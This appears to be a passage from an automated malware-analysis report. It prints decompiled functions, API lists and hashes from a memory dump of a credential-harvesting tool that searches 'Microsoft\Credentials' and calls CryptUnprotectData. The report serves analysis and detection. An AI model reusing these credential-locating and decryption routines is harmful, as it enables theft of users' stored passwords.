                                          • Opcode Fuzzy Hash: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
                                          • Instruction Fuzzy Hash: BB01ECB2C0011CFFDB11DAD4DD85EDEBBACAB08348F1444BAB609E2051D6744F989BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00406982(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
                                          				void* _t8;
                                          				void* _t13;
                                          				signed int _t16;
                                          				void** _t21;
                                          				signed int _t22;
                                          
                                          				_t21 = __edi;
                                          				_t22 =  *__eax;
                                          				if(__edx < _t22) {
                                          					return 0;
                                          				} else {
                                          					_t13 =  *__edi;
                                          					do {
                                          						 *__eax =  *__eax + _a8;
                                          						_t16 =  *__eax;
                                          					} while (__edx >= _t16);
                                          					_t8 = malloc(_t16 * _a4); // executed
                                          					 *__edi = _t8;
                                          					if(_t22 > 0) {
                                          						if(_t8 != 0) {
                                          							memcpy(_t8, _t13, _t22 * _a4);
                                          						}
                                          						0x413de6(_t13);
                                          					}
                                          					return 0 |  *_t21 != 0x00000000;
                                          				}
                                          			}









                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@mallocmemcpy
                                          • String ID:
                                          • API String ID: 3831604043-0
                                          • Opcode ID: 43d69199a7eee8632861a0ca226f395938b4ef25a2d6add8601f3af2fa4d9b08
                                          • Instruction ID: 3aa6f9377dfc5db36287fc2124ba6b3299db699d57604e2b41df5078e12f24d2
                                          • Opcode Fuzzy Hash: 43d69199a7eee8632861a0ca226f395938b4ef25a2d6add8601f3af2fa4d9b08
                                          • Instruction Fuzzy Hash: 22F02EF26082119FC7089F75B94149BB79DAF45324B12443FF405D3285D738DC64C7A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
                                          • _mbscpy.MSVCRT ref: 004103C3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Version_mbscpy
                                          • String ID: CryptUnprotectData
                                          • API String ID: 1856898028-1975210251
                                          • Opcode ID: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
                                          • Instruction ID: 124ef79401bdf720cf005998ce1259a6424ffa61298b62e05562ee11dac58942
                                          • Opcode Fuzzy Hash: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
                                          • Instruction Fuzzy Hash: D0F0A471A0030C9BCF04EBA9D589ADEBBB85F08318F11802FE910B6181D7B8D4C4CB2E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00406AE0() {
                                          				struct tagLOGFONTA _v64;
                                          				struct HFONT__* _t6;
                                          
                                          				E00406A19( &_v64, "Arial", 0xe, 0);
                                          				_t6 = CreateFontIndirectA( &_v64); // executed
                                          				return _t6;
                                          			}






                                          APIs
                                            • Part of subcall function 00406A19: memset.MSVCRT ref: 00406A23
                                            • Part of subcall function 00406A19: _mbscpy.MSVCRT ref: 00406A63
                                          • CreateFontIndirectA.GDI32(?), ref: 00406AFE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CreateFontIndirect_mbscpymemset
                                          • String ID: Arial
                                          • API String ID: 3853255127-493054409
                                          • Opcode ID: 40c99e9d60d1ab3f835d0cb059d53835698da9c32ee7eac16eefe87b5741b715
                                          • Instruction ID: e76317b4d314f44c8759e74956d0c4c6c36286f6473dc8017c9c1f452a7d8835
                                          • Opcode Fuzzy Hash: 40c99e9d60d1ab3f835d0cb059d53835698da9c32ee7eac16eefe87b5741b715
                                          • Instruction Fuzzy Hash: 25D0C970E4020C66D600B7A0FD07BC9776C5B40708F504025BA01B50E1EAE4E1188AD9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                          • Instruction ID: 043642bf5cdc1de150e3446c738409664b5144c0223cf5edf213a9aa475217cd
                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                          • Instruction Fuzzy Hash: 8621E7311493416FEB218B745C017E6BBD8ABA7374F19469BD044CB283D26D98C693AE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E0040C5A4(void* __edi, void* __eflags) {
                                          				void* __esi;
                                          				signed int _t20;
                                          				intOrPtr _t27;
                                          				intOrPtr _t34;
                                          				void* _t38;
                                          				void* _t41;
                                          				void* _t45;
                                          				void* _t47;
                                          				intOrPtr _t48;
                                          
                                          				_t45 = __edi;
                                          				_t34 = 0;
                                          				E00403CB2( *((intOrPtr*)(__edi + 0x390)), __eflags, 0, 0);
                                          				_t20 =  *((intOrPtr*)(__edi + 0x398));
                                          				 *((intOrPtr*)(__edi + 0x108)) = 0;
                                          				if( *((intOrPtr*)(_t20 + 0x30)) <= 0) {
                                          					_t47 = 0x417c88;
                                          				} else {
                                          					if( *((intOrPtr*)(_t20 + 0x1c)) <= 0) {
                                          						_t41 = 0;
                                          						__eflags = 0;
                                          					} else {
                                          						_t41 =  *((intOrPtr*)( *((intOrPtr*)(_t20 + 0xc)))) +  *((intOrPtr*)(_t20 + 0x10));
                                          					}
                                          					_t47 = _t41;
                                          				}
                                          				0x413dce("/stext", _t47);
                                          				if(_t20 != 0) {
                                          					_t48 = E0040C50E(_t20, _t47);
                                          					__eflags = _t48 - _t34;
                                          					if(_t48 <= _t34) {
                                          						goto L15;
                                          					}
                                          					goto L9;
                                          				} else {
                                          					_t48 = 1;
                                          					L9:
                                          					E0040BBF0(_t45, _t34); // executed
                                          					E0040B2F5(_t45);
                                          					_t27 =  *((intOrPtr*)(_t45 + 0x398));
                                          					if( *((intOrPtr*)(_t27 + 0x30)) <= 1) {
                                          						_t38 = 0x417c88;
                                          					} else {
                                          						_t55 =  *((intOrPtr*)(_t27 + 0x1c)) - 1;
                                          						if( *((intOrPtr*)(_t27 + 0x1c)) <= 1) {
                                          							_t38 = 0;
                                          						} else {
                                          							_t38 =  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc)) + 4)) +  *((intOrPtr*)(_t27 + 0x10));
                                          						}
                                          					}
                                          					 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x390)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x38c)) + 0x730));
                                          					E0040A8F2( *((intOrPtr*)(_t45 + 0x390)),  *((intOrPtr*)(_t45 + 0x390)), _t45, _t55, _t38, _t48); // executed
                                          					_t34 = 1;
                                          					E0040BDCF(_t45);
                                          					L15:
                                          					return _t34;
                                          				}
                                          			}













                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi
                                          • String ID: /stext
                                          • API String ID: 1439213657-3817206916
                                          • Opcode ID: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
                                          • Instruction ID: 4d1f9c46abbdb5e83ce0205fdf3861872a59254e2367a1e2376026c6f9217911
                                          • Opcode Fuzzy Hash: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
                                          • Instruction Fuzzy Hash: D721A130614211EFC36C9F2988C1966B3A9BF05314B1556BFB40AA7382DB79EC519BC8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E004042AA(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                          				char _v328;
                                          				char _v652;
                                          				char _v928;
                                          				signed char _v972;
                                          				char _v1296;
                                          				signed int _v1300;
                                          				void* __esi;
                                          				void* _t33;
                                          				char* _t34;
                                          				void* _t38;
                                          				void* _t41;
                                          				intOrPtr _t44;
                                          				void* _t45;
                                          
                                          				_v1300 = _v1300 | 0xffffffff;
                                          				_v1296 = 0;
                                          				_v328 = 0;
                                          				_v652 = 0;
                                          				_t38 = __ecx;
                                          				_t41 = 0;
                                          				E0040783B( &_v1300, __eflags, _a4);
                                          				if(E00407898( &_v1300) == 0) {
                                          					L11:
                                          					E00407930( &_v1300);
                                          					return _t41;
                                          				} else {
                                          					_t44 = _a8;
                                          					do {
                                          						if((_v972 & 0x00000010) != 0) {
                                          							__eflags = E00407800( &_v1300);
                                          							if(__eflags != 0) {
                                          								E004042AA(_t38, __eflags,  &_v652, _t44 + 1);
                                          							}
                                          							goto L10;
                                          						}
                                          						if(E00406B3B() != 0) {
                                          							L6:
                                          							_t33 = E00404220(_t51, _t38,  &_v652); // executed
                                          							if(_t33 != 0) {
                                          								_t41 = 1;
                                          							}
                                          							goto L10;
                                          						}
                                          						if(_t44 < 1) {
                                          							goto L10;
                                          						}
                                          						_t34 =  &_v928;
                                          						0x413d92(_t34, "credentials", 0xb);
                                          						_t45 = _t45 + 0xc;
                                          						_t51 = _t34;
                                          						if(_t34 != 0) {
                                          							goto L10;
                                          						}
                                          						goto L6;
                                          						L10:
                                          					} while (E00407898( &_v1300) != 0);
                                          					goto L11;
                                          				}
                                          			}

















                                          APIs
                                            • Part of subcall function 0040783B: strlen.MSVCRT ref: 00407862
                                            • Part of subcall function 0040783B: strlen.MSVCRT ref: 0040786F
                                            • Part of subcall function 00407898: FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
                                            • Part of subcall function 00407898: strlen.MSVCRT ref: 004078FC
                                            • Part of subcall function 00407898: strlen.MSVCRT ref: 00407904
                                          • _strnicmp.MSVCRT ref: 0040431A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$FileFindFirst_strnicmp
                                          • String ID: credentials
                                          • API String ID: 773473087-4194641934
                                          • Opcode ID: 5f078394bf2af8fae6ee7cd525e99526c652b3bab6a7d26c0a39e7232aba890c
                                          • Instruction ID: 0f17e4e4efe03dbe37520bfce116898ea2601fe450b4b80a5694618c7f7ee9f5
                                          • Opcode Fuzzy Hash: 5f078394bf2af8fae6ee7cd525e99526c652b3bab6a7d26c0a39e7232aba890c
                                          • Instruction Fuzzy Hash: 4E21D872A0421C56DB60F6668C417DB77A85F81349F4460FBAE18F21C2EA78DF84CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                          • Instruction ID: 25f2d81c04f4c45cc56d7cc0e98a54f4dee55ba3048ec5225fe48b17b8cda6c2
                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                          • Instruction Fuzzy Hash: 9101DB3058570179AB2166754C02AFBAF987AE3364F18074BB05497293CA5C89C683BD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E20
                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E34
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                          • Instruction ID: 94a9458822a42be4aa48e0704f6d9666272a38e661a699dcd97394ecc6966311
                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                          • Instruction Fuzzy Hash: 72F022602857003CEF3155B41C42AFB9F8CAAE7360F280A4BF014C7283C59C888683BE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 0040E695
                                            • Part of subcall function 0040F9A0: CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1
                                          • strrchr.MSVCRT ref: 0040E6B1
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CompareFileTimememsetstrrchr
                                          • String ID:
                                          • API String ID: 4226234548-0
                                          • Opcode ID: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
                                          • Instruction ID: 53b6c61b59caaa2062b149ee1151cefa66ffad82665aa7653a439d89524e8348
                                          • Opcode Fuzzy Hash: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
                                          • Instruction Fuzzy Hash: F611BAB1C0522C9EDB21EF5A9C85AC9BBB8BB09304F9040FF9248F2241D7785B94CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E00404380(intOrPtr _a4, intOrPtr _a8) {
                                          				void _v267;
                                          				char _v268;
                                          				void* __edi;
                                          				void* __esi;
                                          				int _t13;
                                          				int _t17;
                                          
                                          				_t17 = 0;
                                          				_v268 = 0;
                                          				memset( &_v267, 0, 0x104);
                                          				_t16 =  &_v268;
                                          				0x41223f(); // executed
                                          				_t21 = _a8;
                                          				if(_a8 != 0) {
                                          					E0040680E( &_v268);
                                          					E00406EFE(_t16, "Microsoft\Credentials");
                                          					_t13 = E004042AA(_a4, _t21, _t16, 0); // executed
                                          					_t17 = _t13;
                                          				}
                                          				return _t17;
                                          			}










                                          APIs
                                          • memset.MSVCRT ref: 004043A1
                                            • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                            • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                            • Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F00
                                            • Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F0B
                                            • Part of subcall function 00406EFE: _mbscat.MSVCRT ref: 00406F22
                                            • Part of subcall function 004042AA: _strnicmp.MSVCRT ref: 0040431A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat$_strnicmpmemset
                                          • String ID: Microsoft\Credentials
                                          • API String ID: 137454763-3148402405
                                          • Opcode ID: b9bc567b91fdf7fc349dfc15b94f9d4a96cdfacf2bcfcbc0785656f82b29690e
                                          • Instruction ID: 677ab761eff5409f3287a779563a9fbc28491fd5395d1aa5cc811df03cb69dee
                                          • Opcode Fuzzy Hash: b9bc567b91fdf7fc349dfc15b94f9d4a96cdfacf2bcfcbc0785656f82b29690e
                                          • Instruction Fuzzy Hash: 8CF0E97260411427D660B66AEC06FCF775C8F90754F00006AF988F71C1D9F8AA95C3E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411EDB
                                          • GetPrivateProfileStringA.KERNEL32(?,?,?,?,?,?), ref: 00411EF0
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfileString$Write
                                          • String ID:
                                          • API String ID: 2948465352-0
                                          • Opcode ID: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
                                          • Instruction ID: d9e70508a7a1dcd4d44e453fce3bd4c14a214bdae5f42dce9164bd63fbf12eb7
                                          • Opcode Fuzzy Hash: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
                                          • Instruction Fuzzy Hash: A7E0E53600020DFBCF018FE0DC44EEA3F79EB48344F04C425BA0989021C776C6A6EBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E00408490(intOrPtr _a4, int _a8, wchar_t* _a12) {
                                          				void* _v8;
                                          				char _v12;
                                          				void* _v35;
                                          				int _v36;
                                          				int _v250;
                                          				char _v252;
                                          				void _v291;
                                          				int _v292;
                                          				void* __ebx;
                                          				void* __esi;
                                          				intOrPtr* _t37;
                                          				void* _t38;
                                          				int _t39;
                                          				intOrPtr* _t42;
                                          				void* _t43;
                                          				void* _t44;
                                          				intOrPtr* _t47;
                                          				void* _t48;
                                          				int _t57;
                                          				void* _t64;
                                          				void* _t66;
                                          				intOrPtr _t67;
                                          				intOrPtr _t70;
                                          				int* _t71;
                                          				struct HINSTANCE__** _t74;
                                          				intOrPtr* _t75;
                                          				void* _t76;
                                          
                                          				_t74 = _a4 + 0x78;
                                          				E00404D18(_t74);
                                          				_t37 =  *((intOrPtr*)(_t74 + 0xc));
                                          				_t57 = 0;
                                          				if(_t37 == 0) {
                                          					_t38 = 0;
                                          				} else {
                                          					_t38 =  *_t37(_a8, 0x8004, 0, 0,  &_v8); // executed
                                          				}
                                          				if(_t38 != _t57) {
                                          					_t39 = wcslen(_a12);
                                          					_t7 = _t39 + 2; // 0x2
                                          					_t66 = _t39 + _t7;
                                          					_a8 = _v8;
                                          					E00404D18(_t74);
                                          					_t42 =  *((intOrPtr*)(_t74 + 0x14));
                                          					if(_t42 == _t57) {
                                          						_t43 = 0;
                                          					} else {
                                          						_t43 =  *_t42(_a8, _a12, _t66, _t57);
                                          					}
                                          					if(_t43 == _t57) {
                                          						L15:
                                          						_t67 = _v8;
                                          						_t44 = E00404D18(_t74);
                                          						_t75 =  *((intOrPtr*)(_t74 + 0x18));
                                          						if(_t75 != _t57) {
                                          							_t44 =  *_t75(_t67);
                                          						}
                                          						return _t44;
                                          					} else {
                                          						_v36 = _t57;
                                          						asm("stosd");
                                          						asm("stosd");
                                          						asm("stosd");
                                          						asm("stosd");
                                          						asm("stosd");
                                          						_t70 = _v8;
                                          						_v12 = 0x14;
                                          						E00404D18(_t74);
                                          						_t47 =  *((intOrPtr*)(_t74 + 0x10));
                                          						if(_t47 == _t57) {
                                          							_t48 = 0;
                                          						} else {
                                          							_t48 =  *_t47(_t70, 2,  &_v36,  &_v12, _t57);
                                          						}
                                          						if(_t48 != _t57) {
                                          							_v292 = _t57;
                                          							memset( &_v291, _t57, 0xff);
                                          							_a8 = _t57;
                                          							_t64 = 0;
                                          							_t71 =  &_v292;
                                          							do {
                                          								_a8 = _a8 + ( *(_t76 + _t64 - 0x20) & 0x000000ff);
                                          								E004081DA(_t71,  *(_t76 + _t64 - 0x20) & 0x000000ff);
                                          								_t64 = _t64 + 1;
                                          								_t71 = _t71 + 2;
                                          							} while (_t64 < 0x14);
                                          							E004081DA( &_v252, _a8);
                                          							_v250 = _t57;
                                          							E004083D0(_a4,  &_v292, _a12);
                                          							_t57 = 0;
                                          						}
                                          						goto L15;
                                          					}
                                          				}
                                          				return _t38;
                                          			}































                                          APIs
                                            • Part of subcall function 00404D18: LoadLibraryA.KERNEL32(advapi32.dll,?,004084A6), ref: 00404D23
                                            • Part of subcall function 00404D18: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404D37
                                            • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00404D43
                                            • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00404D4F
                                            • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00404D5B
                                            • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00404D67
                                            • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00404D73
                                          • wcslen.MSVCRT ref: 004084CF
                                          • memset.MSVCRT ref: 0040854D
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$LibraryLoadmemsetwcslen
                                          • String ID:
                                          • API String ID: 1960736289-0
                                          • Opcode ID: f78174ecb424998fb22a5f41f112440964ae667a2303fb3ee1b26447fe91a2a4
                                          • Instruction ID: 2dd004568a6c17cef409d44c463746fb2ce178d2970b6d5fdfdea9e5a7127ffe
                                          • Opcode Fuzzy Hash: f78174ecb424998fb22a5f41f112440964ae667a2303fb3ee1b26447fe91a2a4
                                          • Instruction Fuzzy Hash: D931A331500159BFCB11DFA4CD819EF77A8AF88304F14447EF985B7181DA38AE599B68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E0040D9B9(intOrPtr* __esi) {
                                          				intOrPtr _v8;
                                          				int _v16;
                                          				int _v20;
                                          				char _v276;
                                          				char _v532;
                                          				void _v1555;
                                          				char _v1556;
                                          				void _v2579;
                                          				char _v2580;
                                          				void* __ebx;
                                          				void* __edi;
                                          				char* _t26;
                                          
                                          				_v8 = 1;
                                          				_v1556 = 0;
                                          				memset( &_v1555, 0, 0x3ff);
                                          				_v2580 = 0;
                                          				memset( &_v2579, 0, 0x3ff);
                                          				_t26 =  &_v1556;
                                          				0x413735(_t26,  &_v2580); // executed
                                          				if(_t26 != 0) {
                                          					_v532 = 0;
                                          					_v276 = 0;
                                          					_v20 = 0;
                                          					_v16 = 0;
                                          					E00406958(0xff,  &_v532,  &_v1556);
                                          					E00406958(0xff,  &_v276,  &_v2580);
                                          					_push( &_v532);
                                          					_v16 = 4;
                                          					_v20 = 7;
                                          					_v8 =  *((intOrPtr*)( *__esi))();
                                          				}
                                          				return _v8;
                                          			}

                                          APIs
                                          • memset.MSVCRT ref: 0040D9E1
                                          • memset.MSVCRT ref: 0040D9F8
                                            • Part of subcall function 00413735: memset.MSVCRT ref: 00413757
                                            • Part of subcall function 00413735: RegCloseKey.ADVAPI32(?,?,?,?,000003FF,?,00000000), ref: 004137BF
                                            • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                            • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$Closememcpystrlen
                                          • String ID:
                                          • API String ID: 1317463181-0
                                          • Opcode ID: 36fe1095114160a690701a78f195309e8067f9881caaff21558cd16a9a1fec4e
                                          • Instruction ID: 9f1eb3389bb6404362c4a1eb730a31a0c8d2a7d5337f5270765416232cb6ce98
                                          • Opcode Fuzzy Hash: 36fe1095114160a690701a78f195309e8067f9881caaff21558cd16a9a1fec4e
                                          • Instruction Fuzzy Hash: 74113DB2D0025CAEDB11DF98DC45BDEBBBCAB55304F0404EAA529B3241D7B45F888F65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0040FA34: memset.MSVCRT ref: 0040FA77
                                            • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA8E
                                            • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA97
                                            • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAF0
                                            • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAFE
                                            • Part of subcall function 00406D2B: GetFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040F9E7,00000000,?,00000000,?,?,00000000), ref: 00406D46
                                            • Part of subcall function 00406D2B: CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00406D4F
                                          • CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$FileTime$CloseCompareHandlememset
                                          • String ID:
                                          • API String ID: 3621460190-0
                                          • Opcode ID: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
                                          • Instruction ID: df050e5846938951bd5ef1dd521a076978c5ac7e099cd3a6f0bbe67f44093ab2
                                          • Opcode Fuzzy Hash: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
                                          • Instruction Fuzzy Hash: 5C114FB2E00109ABDB15EFE9D9415EEBBB9AF44304F20407BE906F3281D6389E45CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          • Opcode ID: 37570f48f22fb23ef0d3df0d3c669cd07964a3a6542881bee3074b52f4b94034
                                          • Instruction ID: a80749d54e4db297dbe5ce684396449be2bdfe43891eac82306683b5e99974c7
                                          • Opcode Fuzzy Hash: 37570f48f22fb23ef0d3df0d3c669cd07964a3a6542881bee3074b52f4b94034
                                          • Instruction Fuzzy Hash: 21E0B675504208FADB01CB90DC41EEE7BBCEB44644F1041AAB90596151E672AB449B64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00411D5E
                                            • Part of subcall function 00411C43: memset.MSVCRT ref: 00411C61
                                            • Part of subcall function 00411C43: _itoa.MSVCRT ref: 00411C78
                                            • Part of subcall function 00411C43: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 00411C87
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfile$StringWrite_itoamemset
                                          • String ID:
                                          • API String ID: 4165544737-0
                                          • Opcode ID: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
                                          • Instruction ID: 191c8e33efa92f5acf0b5800ded4dbdf6d41edfd47def5b2a3195e96d71d9d98
                                          • Opcode Fuzzy Hash: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
                                          • Instruction Fuzzy Hash: 28E0B632004609EBCF125F90EC05AE93F76FF44315F548459FA5C04530D33295B0AF84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00406ED6(void* __ecx, intOrPtr* __esi, void* _a4, void* _a8, long _a12) {
                                          				long _v8;
                                          				int _t9;
                                          
                                          				_v8 = _v8 & 0x00000000;
                                          				_t9 = ReadFile(_a4, _a8, _a12,  &_v8, 0); // executed
                                          				if(__esi != 0) {
                                          					 *((intOrPtr*)(__esi)) = _v8;
                                          					return _t9;
                                          				}
                                          				return _t9;
                                          			}

                                          APIs
                                          • ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: a90c0f663160ddd1806211c67689bb6444212dacbbb8cc2b1f9417cee627f633
                                          • Instruction ID: aa4cf13b5f890a7c287dc17e2503e7ef9553656c8147c817b9e920ceb3cbd6db
                                          • Opcode Fuzzy Hash: a90c0f663160ddd1806211c67689bb6444212dacbbb8cc2b1f9417cee627f633
                                          • Instruction Fuzzy Hash: 21E0173691020CFBDF12CF80CC05FEEBBB9EB04B04F204068B901A62A0C7759E10EB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 9730bdd872ffcfc6838ff9b84d0f6ef43d311b98765be4a3d863fce2df9ab07c
                                          • Instruction ID: d064f037d8cc498e3967daff6ff593c2326981cc2c3d102c7782d5cd9755b432
                                          • Opcode Fuzzy Hash: 9730bdd872ffcfc6838ff9b84d0f6ef43d311b98765be4a3d863fce2df9ab07c
                                          • Instruction Fuzzy Hash: A5C00272A14B018FE7709E55D4057A6B3E4AF1073BF618C1DD4D591581D77CE5848E14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004067D3(CHAR* _a4) {
                                          				void* _t3;
                                          
                                          				_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
                                          				return _t3;
                                          			}

                                          APIs
